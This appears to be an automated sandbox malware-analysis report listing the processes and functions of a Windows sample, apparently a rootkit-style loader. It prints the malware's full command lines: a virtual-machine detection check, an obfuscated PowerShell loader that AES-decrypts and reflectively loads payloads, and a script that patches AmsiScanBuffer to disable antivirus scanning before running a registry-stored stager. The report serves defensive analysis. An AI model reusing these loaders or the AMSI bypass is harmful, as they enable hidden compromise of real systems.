Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:23:05
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff6d4a50000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:23:25
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Imagebase:	0x7ff75e990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:23:25
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: WerFault.exePID: 6500, Parent PID: 5760

General

Target ID:	31
Start time:	10:23:31
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424
Imagebase:	0x7ff7e77e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:23:37
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388
Imagebase:	0x7ff7e77e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:23:37
Start date:	03/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Imagebase:	0x7ff7df650000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:23:37
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:23:40
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xd90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:23:40
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:23:40
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xd90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:23:40
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+''+[Char](105)+'v'+'e'+'Me'+[Char](116)+''+'h'+'o'+'d'+''+[Char](115)+'');$yPaGlLGCRnduqK=$CXUkrbOMeMwqm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+'cAd'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+'bl'+[Char](105)+'c'+','+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gdhANoUlJqediWutYNx=gUdwtNDYXkts @([String])([IntPtr]);$xftKyomHPDnrGsBVhDhGVA=gUdwtNDYXkts @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aMpaxAlnYCj=$CXUkrbOMeMwqm.GetMethod('Ge'+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'an'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+'d'+'l'+'l')));$XzRrrWAvhAruOw=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+'L'+'o'+'a'+'d'+[Char](76)+''+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$UyziTvRkQswynWCwx=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$qNkPxqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$MsjEXyeoZQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,4,[ref]$MsjEXyeoZQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOLdsZyQIYWPbckDA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,0x20,[ref]$MsjEXyeoZQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+'-'+[Char](115)+'t'+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:23:40
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:23:43
Start date:	03/10/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Imagebase:	0x7ff7d8730000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	10:23:44
Start date:	03/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6fc1b0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	10:23:44
Start date:	03/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6d9390000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	10:23:45
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	10:23:45
Start date:	03/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff74b010000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	10:23:46
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	10:23:46
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	10:23:47
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	10:23:48
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	10:23:49
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	10:23:49
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	10:23:50
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	10:23:51
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	10:23:51
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	10:23:52
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	10:23:52
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	10:23:53
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	10:23:53
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	558
Start time:	10:24:04
Start date:	03/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	575
Start time:	10:24:12
Start date:	03/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.5%
Total number of Nodes:	1956
Total number of Limit Nodes:	6

Executed Functions

Function 000002527DEE1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002527DEE1E47
GetProcAddress.KERNEL32 ref: 000002527DEE1E57
SleepEx.KERNELBASE ref: 000002527DEE1E67

Strings

amsi.dll, xrefs: 000002527DEE1E40
AmsiScanBuffer, xrefs: 000002527DEE1E50

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 200d946d725ee9b98254b8358bca941e67ba4a8d85ed93542f15d48ee567d6e6
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 1FD06710611E00D7FA8AEB11EC9C758A262EBAFB43FD54455C50A012E4DE3C8A9DC358

Function 000002527DEE1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002527DEE1E7F

Part of subcall function 000002527DEE22A8: GetModuleHandleA.KERNEL32(?,?,?,000002527DEE1EB1), ref: 000002527DEE22C0
Part of subcall function 000002527DEE22A8: GetProcAddress.KERNEL32(?,?,?,000002527DEE1EB1), ref: 000002527DEE22D1

CreateThread.KERNELBASE ref: 000002527DEE2043
TlsAlloc.KERNEL32 ref: 000002527DEE2049
TlsAlloc.KERNEL32 ref: 000002527DEE2055
TlsAlloc.KERNEL32 ref: 000002527DEE2061
TlsAlloc.KERNEL32 ref: 000002527DEE206D
TlsAlloc.KERNEL32 ref: 000002527DEE2079
TlsAlloc.KERNEL32 ref: 000002527DEE2085

Strings

pdh.dll, xrefs: 000002527DEE1FD7, 000002527DEE1FF8
PdhGetFormattedCounterArrayW, xrefs: 000002527DEE1FF1
PdhGetRawCounterArrayW, xrefs: 000002527DEE1FD0
NtDeviceIoControlFile, xrefs: 000002527DEE1FB6
NtQuerySystemInformation, xrefs: 000002527DEE1EA5
AmsiScanBuffer, xrefs: 000002527DEE2012
ntdll.dll, xrefs: 000002527DEE1E8D
NtQueryDirectoryFile, xrefs: 000002527DEE1EDF
NtResumeThread, xrefs: 000002527DEE1EC2
advapi32.dll, xrefs: 000002527DEE1F57, 000002527DEE1F78
EnumServicesStatusExW, xrefs: 000002527DEE1F71, 000002527DEE1F92
NtEnumerateKey, xrefs: 000002527DEE1F19
amsi.dll, xrefs: 000002527DEE2019
EnumServiceGroupW, xrefs: 000002527DEE1F50
NtEnumerateValueKey, xrefs: 000002527DEE1F36
NtQueryDirectoryFileEx, xrefs: 000002527DEE1EFC
sechost.dll, xrefs: 000002527DEE1F99

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
